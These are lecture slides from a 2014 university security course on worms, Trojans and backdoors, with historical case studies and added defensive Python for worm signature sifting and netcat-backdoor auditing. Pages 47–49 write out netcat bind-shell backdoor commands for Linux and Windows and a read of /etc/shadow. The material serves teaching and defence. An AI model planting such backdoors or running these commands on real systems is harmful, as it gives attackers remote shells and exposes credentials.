CSCD 434 Spring 2014 Lecture 9a Attacks Worms, Trojans, Backdoors

Page 1

CSCD 434 Spring 2014
Lecture 9a Attacks
Worms, Trojans, Backdoors

Page 2

Introduction
• Today, cover malware
– Worms, Trojan Horses / Backdoors
– Define Rootkits, viruses - Cover later
– Nearly all of these infect computers via the network
• Email counts as a form of remote infection
– If you do decide to write one for fun don’t release it … could get into trouble ...

Page 3

Definitions
• Worm
– Replicates itself, stand alone program, spreads via a network
• Virus
– Program that attaches itself to another program
– Replicates itself, program must be run
• Trojan horse
– Program that pretends to do one thing but does something behind the scenes
• Rootkit
– A root kit is a component that uses stealth to maintain a persistent and undetectable presence on the machine

Page 4

Almost 30 years of Malware

Page 5

Purpose of Malware
• What is the main purpose of most modern malware?
• Profit!!!!
• Modern malware is a for-profit, big-business undertaking
• Online criminals invest significant amounts of money and time in more efficient malware and better malware distribution mechanisms because financial rewards can be enormous
• According to a report issued by research company Computer Economics, the direct damage attributed to malware totaled $13 billion globally in 2006
http://www.computereconomics.com/article.cfm?id=1225

Page 6

Purpose of Malware
• How is it distributed these days?
• Malware has been part of computing for decades
• In the 1990s, floppy disks: it got onto your computer or network when you stuck an infected floppy disk into your drive
• Then, as email became more prevalent, hackers designed malware to spread as infected email attachments
• Today, the Internet is a fantastic distribution mechanism for malware

Page 7

Worms

Page 8

Worms
• A worm is self-replicating software designed to spread through the network
– Typically exploits security flaws in widely used services ... mostly buffer overflows
– Causes massive damage
• Launch DDoS attacks
• Install bot networks
• Access sensitive information
• Used for spam

Page 9

Worms
• Worm vs Virus vs Trojan horse
– A virus is code embedded in a file or program
– Viruses and Trojan horses rely on humans
• Human must access file or run program
– Worms are often self-contained and may spread autonomously ... and they do!
• Can also spread via email, Internet

Page 10

Worms Spread?
• Copy itself directly across the network
• Read your address book
– Emails itself to everyone in your address book
– How easy is it to do this?
– Microsoft Outlook – was trivial, < 5 lines of code to send out an email
– Can cause Outlook to send emails without user awareness
– Reason why so many worms for Outlook

Page 11

Historical Worm Examples

Page 12

Morris Worm
• First appeared in 1988
• Purpose
– Determine where it could spread
– Spread its infection
– Remain undiscovered
• Robert Morris claimed his worm had a bug…
• The Morris worm tried to re-infect systems
– Led to resource exhaustion

Page 13

Morris Worm
How did it spread? Multi-vector Attack Capability!!!
• Tried to obtain access to machine by…
– User account password guessing
– Exploited buffer overflow in fingerd, which identifies users
– Exploited debug code in sendmail
• Flaws in fingerd and sendmail were well-known at the time, but not widely patched

Page 14

Morris Worm
• Once access had been obtained to machine…
• “Bootstrap loader” sent to victim
– Consisted of 99 lines of C code
• Victim machine compiled and executed code
• Bootstrap loader fetched the rest of worm

Page 15

Morris Worm
• Why was it successful?
– For its time, it was truly sophisticated in its behavior
• If transmission of worm was interrupted, all code was deleted
• Code encrypted when downloaded
• Code deleted after decrypting and compiling
• When running, worm regularly changed its name and process identifier (PID)

Page 16

I-Love-You Worm
• E-mail worm arrived May 4, 2000, with subject of "ILOVEYOU" and an attachment
– LOVE-LETTER-FOR-YOU.TXT.vbs

Page 17

I-Love-You Worm
• LOVE-LETTER-FOR-YOU.TXT.vbs
– Upon opening attachment, software sent copy of itself to everyone in user's address list, posing as user
• Overwrote all these file types:
• VBS, VBE, JS, JSE, CSS, WSH, SCT, HTA, JPG, JPEG, MP3, and MP2
• Overwritten files contain worm's body and extensions changed to vbs

Page 18

I-Love-You Worm
How did it spread?
• Sent a copy of itself to first 50 addresses in Windows Address Book used by Microsoft Outlook
Why was it successful?
• Took advantage of Microsoft's practice of hiding file extensions. Windows had begun hiding extensions by default
• Enticed users to open attachment, ensuring continued propagation
• Exploited systemic weaknesses in design of Microsoft Outlook and Microsoft Windows which led to unused features easily running malicious code capable of achieving complete access to operating system

Page 19

Code Red 1 V1
• July 13, 2001: First worm of modern era
• Exploited buffer overflow in Microsoft’s Internet Information Server (IIS)
How did it spread?
• 1st through 20th of each month: Spread
– Find new targets by random scan of IP address space
– Spawn 99 threads to generate addresses and look for IIS
– Creator forgot to seed random number generator, and every copy scanned same set of addresses ... Oops
• 21st through the end of each month: Attack
– Defaced websites with “HELLO! Welcome to http://www.worm.com! Hacked by Chinese!”

Page 20

Code Red 1 V2
• July 19, 2001: Same codebase as Code Red 1, but fixed the bug in random IP address generation
– Compromised all vulnerable IIS servers on Internet
– Fast spread
• Scanned address space grew exponentially
• 350,000 hosts infected in 14 hours!!
• Payload: distributed packet flooding (denial of service) attack on www.whitehouse.gov

Page 21

Code Red 2
• August 4, 2001: Same IIS vulnerability, completely different code, kills Code Red I
– Known as “Code Red II” because of comment in code
– Worked only on Windows 2000, crashed NT
• Scanning algorithm preferred nearby addresses
– Chose addresses from same class A with probability 1/2, same class B with probability 3/8, and randomly from the entire Internet with probability 1/8
• Payload: installed root backdoor in IIS servers for unrestricted remote access
• Died by design on October 1, 2001

Page 22

[Figure: timeline of Code Red 1, Code Red 2 and Nimda activity. Annotations: Code Red 2 kills off Code Red 1; Code Red 2 settles into weekly pattern; Nimda enters the ecosystem; Code Red 2 dies off as programmed; CR 1 returns thanks to bad clocks]

Slides: Vern Paxson

Page 23

SQL Slammer
• Another modern worm …
• SQL Slammer, January 2003
– Although titled "SQL slammer worm", program didn't use SQL language
• How did it work?
• Exploited buffer overflow bug in Microsoft's SQL Server and Desktop Engine database products, for which patch had been released six months earlier
• Affected Microsoft SQL 2000
– Vulnerable population, 75,000 machines infected in less than 10 minutes
http://en.wikipedia.org/wiki/SQL_slammer_worm
http://www.die.net/musings/sql_slammer/

Page 24

[Figure: Slammer infection map at 05:29:00 UTC, January 25, 2003]
[from Moore et al. “The Spread of the Sapphire/Slammer Worm”]

Page 25

30 Minutes Later
[Figure: Slammer infection map 30 minutes later; size of circles is logarithmic in the number of infected machines]
[from Moore et al. “The Spread of the Sapphire/Slammer Worm”]

Page 26

Secret of Slammer’s Speed
• Why was it successful?
• Old-style worms (Code Red) spawn a new thread which tries to establish TCP connection
• If successful, send a copy of itself over TCP
– Limited by latency of the network
• Slammer, improved concept, connectionless UDP worm
– No connection establishment, simply sent 404-byte UDP packet to randomly generated IP addresses
– Limited only by bandwidth of the network

Page 27

Modern Day Worms

Page 28

Modern Worms Don't Just Spread
• Old-Style Worms
– Mostly to spread, very noticeable in attacks
– How fast and far can we go?
– Sometimes, dropped other malware to maintain access
• Modern Worms
– Stealthier
– Always have payload of more malware
– Many infection vectors - not just one
– Use resources of machine, glean user information

Page 29

Modern Worms Don't Just Spread
• These worms spread more subtly,
– Without making noise
– Symptoms don't appear immediately, infected computer can sit dormant for a long time
– If it were a disease,
• More like syphilis, whose symptoms may be mild or disappear altogether,
• Eventually come back years later and eat your brain !!
– Bruce Schneier http://www.schneier.com/blog/archives/2007/10/the_storm_worm.html

Page 30

Storm Worm 2007
• How did it spread?
• Spread by cleverly designed spam campaign
– Arrived as an email with catchy subject
• First instance: “230 dead as storm batters Europe”
• Other examples: “Condoleeza Rice has kicked German Chancellor”, “Radical Muslim drinking enemies’s blood”, “Saddam Hussein alive!”, “Fidel Castro dead”, etc.
• Attachment or URL with malicious payload
– FullVideo.exe, MoreHere.exe, ReadMore.exe, etc.
– Also masquerade as flash postcards
• Once opened,
• Installs trojan (wincom32) and rootkit !!!

Page 31

Storm Worm Characteristics
• Infected host joined Botnet
• Obfuscated P2P control structure
– Interacted with peers via eDonkey protocol
• Obfuscated code, anti-debugging defenses
– Goes into infinite loop if detects VMware or Virtual PC
– Large number of spurious probes, evidence of external analysis, triggers distributed DoS attack
• Infection Estimates
– Between 1 million and 50 million computers infected worldwide

Page 32

Storm Worm Characteristics
• Storm's Payload
• Morphed every 30 minutes or so,
– Typical AV (antivirus) and IDS techniques less effective --- they use code signatures to detect
• Storm e-mail also changed all the time, leveraging social engineering techniques
– Always new subject lines and new enticing text
• Storm began attacking anti-spam sites focused on identifying it -- spamhaus.org, 419eater -- and the personal website of Joe Stewart, who publicized an analysis of Storm

[Image: Joe Stewart]

Page 33

Conficker Worm
http://www.confickerworkinggroup.org/wiki/pmwiki.php/ANY/InfectionDistribution
• Conficker.A first detected on 21 November 2008 and exploited MS08-067; below is infection as of 4/1/2009
[Figure: Conficker infection distribution as of 4/1/2009]
MS08-067 Server Service Buffer Overflow
– This service facilitates file, print, and named-pipe sharing over the network for Windows-based computers
– Successful exploitation may result in execution of arbitrary code on the target host with System privileges!!!!

Page 34

Conficker Worm
• Conficker.B, detected in February 2009, added ability to spread through network shares and removable storage devices
– USB drives and AutoRun function in Windows
• Conficker.C shuts down security services, blocks computers from connecting to security Web sites, and downloads a Trojan
• Also reaches out to other infected computers via P2P networking
– Includes list of 50,000 different domains, 500 will be contacted by infected computer on April 1 to receive updated copies or other malware or instructions

Page 35

Conficker Worm
Where did Conficker come from?
– Ties to Russian Business Network
What is its purpose?
– Conficker's main purpose is to provide its authors with a secure binary update service that allows them instant control of the millions of infected PCs worldwide
– Conficker disables Windows systems security services as well as third-party firewalls and anti-virus products, leaving systems in a vulnerable state which can lead to more infection and infiltration.
“In April, 2009 Cyber Secure Institute estimated that the economic cost of Conficker is as high as $9.1 billion based on the average cost for related malware incidents analyzed in their previous studies”
http://www.zdnet.com/blog/security/manchester-city-council-pays-2-4m-in-conficker-clean-up-costs/3690
• Is Conficker still a threat in 2013? YES. Currently is still a problem.
http://news.softpedia.com/news/Microsoft-Conficker-Still-a-Threat-Uses-Weak-Passwords-to-Spread-266483.shtml

Page 36

Worm Propagation Methods
• Scanning worms - Worm chooses “random” address
• Coordinated scanning - Different worm instances scan different addresses
• Meta-server worm - Ask server for hosts to infect
• Topological worm - Uses information from infected hosts
– Web server logs, email address books, config files, SSH “known hosts”
• Contagion worm - Propagates parasitically along with normally initiated communication

Page 37

Worm Signature
• Monitor network and look for strings common to traffic with worm-like behavior
• Signatures can then be used for content filtering
Slide: S Savage

Page 38

Content Sifting
• Assume there exists some (relatively) unique invariant bitstring W across all instances of a particular worm
• Two Consequences
– Content Prevalence: W will be more common in traffic than other bitstrings of the same length
– Address Dispersion: set of packets containing W will address a disproportionate number of distinct sources and destinations
• Content sifting: Find W’s with high content prevalence and high address dispersion and drop that traffic …
• Any Problems with this?
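The prevalence-plus-dispersion test above, worked in Python as an added example (not code from the lecture): it sifts constructed sample traffic for 8-byte windows, merges the flagged windows back into a signature, and contrasts that with a prevalence-only filter, which is one answer to the slide's closing question since common protocol strings like HTTP/1.1 are prevalent too.

```python
"""Content sifting: flag byte strings with BOTH high content prevalence and high
address dispersion. Added example for this lecture; all traffic is constructed."""
from collections import defaultdict
from typing import Dict, Iterable, List, NamedTuple, Set


class Packet(NamedTuple):
    src: str
    dst: str
    payload: bytes


K = 8  # content-block (window) length in bytes; deployed systems use longer windows

# Constructed invariant string W shared by every copy of the pretend worm.
WORM = b"<worm-invariant>"

# Constructed traffic: 8 worm packets, each from a different source to a different
# destination with a varying byte either side of W; then two ordinary HTTP requests,
# one repeated 10 times on a single flow and one sent to 5 destinations.
TRAFFIC: List[Packet] = [
    Packet(f"10.0.{i}.1", f"192.0.2.{i + 1}", bytes([0x41 + i]) + WORM + bytes([0x61 + i]))
    for i in range(8)
]
TRAFFIC += [Packet("10.0.0.5", "198.51.100.7", b"GET /index.html HTTP/1.1\r\nHost: a\r\n")] * 10
TRAFFIC += [Packet("10.0.0.6", f"198.51.100.{i}", b"GET /about HTTP/1.1\r\nHost: b\r\n") for i in range(5)]


def sift(packets: Iterable[Packet], k: int = K) -> Dict[bytes, tuple]:
    """Per k-byte window: (packet count, distinct sources, distinct destinations).
    A window is counted once per packet so one long packet cannot inflate prevalence."""
    stats: Dict[bytes, list] = defaultdict(lambda: [0, set(), set()])
    for p in packets:
        for w in {p.payload[i:i + k] for i in range(len(p.payload) - k + 1)}:
            entry = stats[w]
            entry[0] += 1
            entry[1].add(p.src)
            entry[2].add(p.dst)
    return {w: (c, len(s), len(d)) for w, (c, s, d) in stats.items()}


def prevalent_only(packets, k=K, min_prevalence=5) -> Set[bytes]:
    """Prevalence alone: also catches legitimate, common protocol strings."""
    return {w for w, (c, _, _) in sift(packets, k).items() if c >= min_prevalence}


def suspicious(packets, k=K, min_prevalence=5, min_srcs=4, min_dsts=4) -> Dict[bytes, tuple]:
    """Windows that pass BOTH tests: content prevalence and address dispersion."""
    return {w: v for w, v in sift(packets, k).items()
            if v[0] >= min_prevalence and v[1] >= min_srcs and v[2] >= min_dsts}


def merge_windows(windows: Iterable[bytes]) -> List[bytes]:
    """Chain overlapping windows (x[1:] == y[:-1]) into longer candidate signatures."""
    wins = set(windows)
    starts = [w for w in wins if not any(x[1:] == w[:-1] for x in wins)]
    sigs = []
    for s in starts:
        sig, cur = bytearray(s), s
        for _ in range(256):  # bound the walk in case of periodic content
            nxt = [x for x in wins if x[:-1] == cur[1:] and x != cur]
            if len(nxt) != 1:
                break
            cur = nxt[0]
            sig.append(cur[-1])
        sigs.append(bytes(sig))
    return sigs


def signatures(packets) -> List[bytes]:
    """Merged signatures for everything content sifting would drop."""
    return merge_windows(suspicious(packets))


if __name__ == "__main__":
    print("prevalence-only would also drop:", sorted(prevalent_only(TRAFFIC) - set(suspicious(TRAFFIC)))[:3])
    print("content-sifting signatures:", signatures(TRAFFIC))
```

The remaining problem the example cannot fix is the assumption itself: a polymorphic worm has no invariant W, and a whitelist of common protocol strings is still needed in practice.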

Page 39

Malicious Code
• Worms are now used to build botnets
• Hundreds of thousands of vulnerable computers are still being used to launch spam campaigns
• 70 percent of all spam is now sent this way, according to anti-spam firm Message Labs Inc.
• Perhaps 6 to 7 billion spam messages are routed through hacked home computers

Page 40

Malicious Code
• Attack Trends
– Crossbreeding
• Combo Malware raises threat, treats each element as a building block
• Malware developer of today constructs an attack tool by selecting various blocks and combining them in a single piece of code
– Worms used to spread backdoors
– Bugbear.b worm, which appeared in 2003, featured several backdoors
– Blaster worm and Sobig.F virus also installed backdoors

Page 41

Malicious Code
• Attack Trends
• Combo Malware ... far more likely to find some hole in your defenses than single-trick malware
• To fight combo malware, you need more than your signature-based AV engine loaded on servers and desktops
• You need to think in terms of holistic defense, addressing multiple vulnerability points, hardening your overall network and preparing for the worst
Ed Skoudis

Page 42

Attack Trends
Exploit Kits
• Exploit kits are a type of malicious toolkit used to exploit security holes found in software applications (Adobe Reader, etc.) for the purpose of spreading malware
• These kits come with pre-written exploit code and target users running insecure or outdated software applications on their computers
• Kaspersky Labs states that MPack was one of the first publicly recorded kits available, released in late 2006 by Russian programmers
• The kit went viral and was spotted on more than 10,000 websites shortly after release

Page 43

Attack Trends
• Today’s modern exploit kit comes neatly packaged by the author and does not require any knowledge of how an exploit works.
• In addition, most exploit kits have a user-friendly web interface that allows licensed users to login and view active victims and statistics
• It is a very profitable trade for the author to create and manage these kits, as licenses can be very costly to purchase—as much as $10,000 per month—and these price tags are matched by an increasing demand. Even a typical kit usually costs around $500 a month

Page 44

Attack Trends Exploit Kits
Acquiring a kit
• Due to their illicit nature, acquiring exploit kits can sometimes be difficult
• Most of these kits are only available in underground black hat forums where they’re licensed directly from the author
• These forums aren’t usually indexed in popular search engines, such as Google, and therefore can be difficult to find without doing a little digging first
http://blog.malwarebytes.org/intelligence/2013/02/tools-of-the-trade-exploit-kits/

Page 45

Maintaining Access
• Once you have infected a computer,
– Gotten in through a vulnerability
• System or Human
• Maintaining access needs a stealthy way back in ..
• Install a remote control backdoor on victim system
• Backdoor allows attacker access in the future

Page 46

Backdoors
• What is a Backdoor?
– Once you penetrate a machine through one of the ways we talked about previously
– You want to install a future access point
– A backdoor is a way in to the system that allows an attacker admission whenever they want

Page 47

Backdoors
• Example
– Netcat tool
• Claim that netcat is one of the most popular backdoor tools in use today
• Netcat when run on victim machine can be configured to listen on any TCP port
– Executes any program for traffic coming in on that port
– Will have same permission as account from which netcat was executed
– Can send it data and have it executed on victim machine
• Assume attacker has gained access to a victim machine and wants to set up a command-shell backdoor

Page 48

Backdoors Linux Example

$ nc -l -p 12345 -e /bin/sh    (backdoor on victim_machine)

Runs the netcat program which listens on TCP port 12345 and executes shell with data sent on port 12345

$ nc victim_machine 12345    (client on attacker machine)

cmd: ls    (will list contents of directory from victim machine)
sensitive_documents tools games

cmd: cat /etc/shadow    (only works if user on victim has root)

Page 49

Backdoors
• Example - Windows Machine
• Can also use netcat on Windows machine
• Instead of /bin/sh will use cmd.exe

C:\> nc -l -p 12345 -e cmd.exe    (on victim machine)

Similar results!
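A defender's check for the listener backdoor set up on the previous three slides, added here as an example (not code from the lecture): it parses `ss -ltnp`-style output and the listeners' command lines, both constructed below, and flags a netcat process, a listening port outside the host's expected services, and an exec flag that hands the socket to a shell. The expected-port list and the command lines are assumptions for the example.

```python
"""Audit listening TCP sockets for netcat-style shell backdoors.
Added example, not from the lecture; the socket listing and argv data are constructed."""
import re
from typing import Dict, List, NamedTuple

# Constructed `ss -ltnp` output: sshd and mysqld are expected services, the nc listener is not.
SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22          0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       1       0.0.0.0:12345       0.0.0.0:*          users:(("nc",pid=4242,fd=3))
LISTEN  0       511     127.0.0.1:3306      0.0.0.0:*          users:(("mysqld",pid=901,fd=20))
"""
# Constructed stand-in for /proc/<pid>/cmdline (NUL-separated argv), keyed by pid.
CMDLINES: Dict[int, bytes] = {
    812: b"/usr/sbin/sshd\x00-D\x00",
    4242: b"nc\x00-l\x00-p\x0012345\x00-e\x00/bin/sh\x00",
    901: b"/usr/sbin/mysqld\x00",
}
EXPECTED_PORTS = {22, 3306}  # assumed inventory of this host's legitimate listeners
NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.openbsd", "nc.traditional"}
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "cmd.exe", "powershell.exe"}

# LISTEN rows only: local addr:port, then the first ("name",pid=N) in the Process column.
LINE_RE = re.compile(r'^LISTEN\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+users:\(\("([^"]+)",pid=(\d+)')


class Finding(NamedTuple):
    port: int
    process: str
    pid: int
    reasons: tuple


def exec_target(cmdline: bytes) -> str:
    """Program named after a netcat/ncat exec-style flag, or '' if there is none."""
    argv = cmdline.split(b"\x00")
    for i, arg in enumerate(argv[:-1]):
        if arg in (b"-e", b"-c", b"--exec", b"--sh-exec"):
            return argv[i + 1].decode(errors="replace")
    return ""


def audit(ss_text: str, cmdlines: Dict[int, bytes]) -> List[Finding]:
    """Return one Finding per listener that trips any of the three checks."""
    findings: List[Finding] = []
    for line in ss_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        port, proc, pid = int(m.group(2)), m.group(3), int(m.group(4))
        reasons = []
        if proc in NETCAT_NAMES:
            reasons.append("listener process is netcat")
        if port not in EXPECTED_PORTS:
            reasons.append("port not in expected-services inventory")
        target = exec_target(cmdlines.get(pid, b""))
        if target in SHELLS:
            reasons.append(f"exec flag hands the socket to {target}")
        if reasons:
            findings.append(Finding(port, proc, pid, tuple(reasons)))
    return findings


if __name__ == "__main__":
    for f in audit(SS_OUTPUT, CMDLINES):
        print(f"port {f.port} pid {f.pid} ({f.process}): " + "; ".join(f.reasons))
```

On a live Linux host the same logic runs over real `ss -ltnp` output and `/proc/<pid>/cmdline`; the Windows variant of the slide would be checked with `netstat -ano` plus the process list instead.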

Page 50

Backdoors and Trojans
• Trojans
– Classic example: Replace /bin/login - lets users log in to system but saves passwords for later analysis
• Trojan Backdoor
– Combination of a backdoor hiding inside of a trojan program

Page 51

References
Code Project Stuxnet Analysis
http://www.codeproject.com/Articles/246545/Stuxnet-Malware-Analysis-Paper
Sans Conficker
http://www.sans.org/security-resources/malwarefaq/conficker-worm.php
Malware Toolkits
http://blog.malwarebytes.org/intelligence/2013/02/tools-of-the-trade-exploit-kits/
Malware History – Nice document
http://download.bitdefender.com/resources/files/Main/file/Malware_History.pdf
Malware Databases
http://www.exploit-db.com/
http://packetstormsecurity.com/files/tags/exploit/
Malware Timeline
http://malware.wikia.com/wiki/Timeline_of_noteworthy_computer_viruses,_worms_and_Trojan_horses

Page 52

Summary
– Malware – Viruses, Worms and combinations including Trojan backdoor components are rampant
– Continues to be a serious problem for everyone using the Internet
– Not just teenagers looking to brag anymore
• More and more the proliferation appears to be related to the business of spamming

Page 53

The End
There is a Malware Lab, on your own!!!!